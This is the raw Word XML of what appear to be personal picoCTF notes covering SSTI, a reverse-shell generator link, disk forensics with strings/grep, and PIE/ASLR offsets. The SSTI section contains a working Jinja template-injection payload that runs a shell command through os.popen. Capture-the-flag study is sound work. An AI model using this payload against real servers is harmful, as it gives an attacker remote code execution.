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1E3548" w14:textId="57DF3250" w:rsidR="001479DD" w:rsidRPr="004964E8" w:rsidRDefault="00360D45">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004964E8">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FADD6" w14:textId="0442D18C" w:rsidR="00360D45" w:rsidRDefault="00360D45">
      <w:r w:rsidRPr="00360D45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126DA9CD" wp14:editId="7B565B57">
            <wp:extent cx="5943600" cy="3693795"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="505647776" name="Picture 1" descr="A diagram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5647776" name="Picture 1" descr="A diagram of a computer program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93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898F3C" w14:textId="226EE018" w:rsidR="00C24BDA" w:rsidRDefault="00C24BDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111111"/>
        </w:rPr>
        <w:t>{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFC29A" w14:textId="77777777" w:rsidR="00751157" w:rsidRPr="004964E8" w:rsidRDefault="00751157" w:rsidP="00751157">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D253B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004964E8">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D253B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>n0s4n1ty 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D12CC4" w14:textId="18E8468B" w:rsidR="00751157" w:rsidRDefault="00751157">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Online - Reverse Shell Generator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BD73B54" w14:textId="0B5ED461" w:rsidR="002C6C6E" w:rsidRPr="004964E8" w:rsidRDefault="002C6C6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004964E8">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DISKO 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19555085" w14:textId="5F5BFA61" w:rsidR="002C6C6E" w:rsidRDefault="002C6C6E">
      <w:r w:rsidRPr="002C6C6E">
        <w:t>FAT32 file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AE573" w14:textId="3AED16F6" w:rsidR="002C6C6E" w:rsidRDefault="002C6C6E">
      <w:r w:rsidRPr="002C6C6E">
        <w:t>Sequential access devices are storage devices where data is accessed in a specific order, one after another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7AC56" w14:textId="3C8FE2FC" w:rsidR="002C6C6E" w:rsidRDefault="002C6C6E">
      <w:r w:rsidRPr="002C6C6E">
        <w:t>A block device is a type of computer storage device that allows data to be accessed in fixed-size blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A0061" w14:textId="4804888F" w:rsidR="002C6C6E" w:rsidRDefault="002C6C6E">
      <w:r w:rsidRPr="002C6C6E">
        <w:t xml:space="preserve">Solid state drives (SSD) and hard disk drives (HDD) are data storage devices. SSDs store data in flash memory, while HDDs store data in magnetic disks. SSDs are a newer technology that uses silicon's physical and chemical properties to offer more storage </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C6E">
        <w:lastRenderedPageBreak/>
        <w:t>volume, speed, and efficiency. However, HDDs are a cost-efficient option if you require infrequent data access in blocks of 1 MB or more at a time.</w:t>
      </w:r>
      <w:r w:rsidR="008629AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="004964E8" w:rsidRPr="00604A97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/compare/the-difference-between-ssd-hard-drive/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4672B398" w14:textId="5D3ED11C" w:rsidR="004964E8" w:rsidRDefault="004964E8">
      <w:r>
        <w:t>Strings disko-1.dd | grep “picoCTF”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C3CA7" w14:textId="728DA9D8" w:rsidR="004964E8" w:rsidRDefault="004964E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004964E8">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PIE TIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9AE3B9" w14:textId="3C2AA154" w:rsidR="004964E8" w:rsidRDefault="004964E8">
      <w:r w:rsidRPr="004964E8">
        <w:t>Due to PIE, the addresses of all functions change on every execution, making a fixed address attack impossible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA317C" w14:textId="6CA84D4A" w:rsidR="004964E8" w:rsidRDefault="004964E8">
      <w:r w:rsidRPr="004964E8">
        <w:t>The offset between win() and main() remains constant because ASLR (Address Space Layout Randomization) only affects the base address of the binary, not the relative offsets of functions inside it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B461BB" w14:textId="0F1E689A" w:rsidR="004964E8" w:rsidRPr="004964E8" w:rsidRDefault="004964E8">
      <w:r w:rsidRPr="004964E8">
        <w:t>ASLR only randomizes the base address (where the program is loaded into memory), but the internal function offsets remain the same.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004964E8" w:rsidRPr="004964E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0D45"/>
    <w:rsid w:val="000A5617"/>
    <w:rsid w:val="001479DD"/>
    <w:rsid w:val="001A1DF1"/>
    <w:rsid w:val="002651F1"/>
    <w:rsid w:val="002C6C6E"/>
    <w:rsid w:val="00360D45"/>
    <w:rsid w:val="004964E8"/>
    <w:rsid w:val="005379F5"/>
    <w:rsid w:val="00751157"/>
    <w:rsid w:val="008629AB"/>
    <w:rsid w:val="00963143"/>
    <w:rsid w:val="00AB6A07"/>
    <w:rsid w:val="00B17859"/>
    <w:rsid w:val="00C24BDA"/>
    <w:rsid w:val="00D212B6"/>
    <w:rsid w:val="00E415D2"/>
    <w:rsid w:val="00FC56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573007"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{14DD2BA5-8BD7-4CC1-B20E-7D10F75C52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0D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0D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60D4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0D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0D4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0D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0D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0D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0D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0D4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0D4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60D4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0D4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0D4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0D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0D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0D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0D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0D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0D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0D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0D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0D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0D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0D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0D4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0D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0D4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0D4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51157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964E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0571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aws.amazon.com/compare/the-difference-between-ssd-hard-drive/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="Externa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2</Pages>
  <Words>219</Words>
  <Characters>1250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Dawid Kowalski</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dawid Kowalski</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-12T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-15T07:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>